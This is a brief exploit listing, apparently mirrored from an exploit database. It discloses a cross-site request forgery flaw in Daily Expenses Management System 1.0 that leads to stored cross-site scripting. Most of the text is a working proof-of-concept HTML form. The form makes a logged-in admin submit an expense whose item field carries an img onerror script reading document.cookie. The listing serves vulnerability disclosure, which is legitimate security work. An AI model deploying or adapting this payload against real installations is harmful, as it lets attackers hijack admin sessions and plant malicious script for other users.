Exploit for Daily Expenses Management System 1.0 Cross SIte Request Forgery Vulnerability

Name: Exploit for Daily Expenses Management System 1.0 Cross SIte Request Forgery Vulnerability
Rating: 5 (116 reviews)

2020-08-06 | CVSS -0.2

## https://sploitus.com/exploit?id=1337DAY-ID-34797
# Exploit Title: Daily Expenses Management System 1.0  - Cross-Site Request Forgery
# Exploit Author: Edo Maland
# Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
# Software Link:  https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
# Version: 1.0
# Tested on: XAMPP / Windows 10

# Vulnerability Details
# Description :  Cross-Site Request Forgery Lead to Persistent Cross-Site Scripting (CSRF to XSS Stored)

# POC

An attacker can force the admin to add a product

URL : https://example.com/dets/manage-expense.php
  - Feature : Add Expense


# CSRF HTML

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://example.com/dets/add-expense.php" method="POST">
      <input type="hidden" name="dateexpense" value="2020-08-12" />
      <input type="hidden" name="item" value="<img src=xss onerror=alert(document.cookie)>" />
      <input type="hidden" name="costitem" value="1337" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

#  0day.today [2020-08-10]  #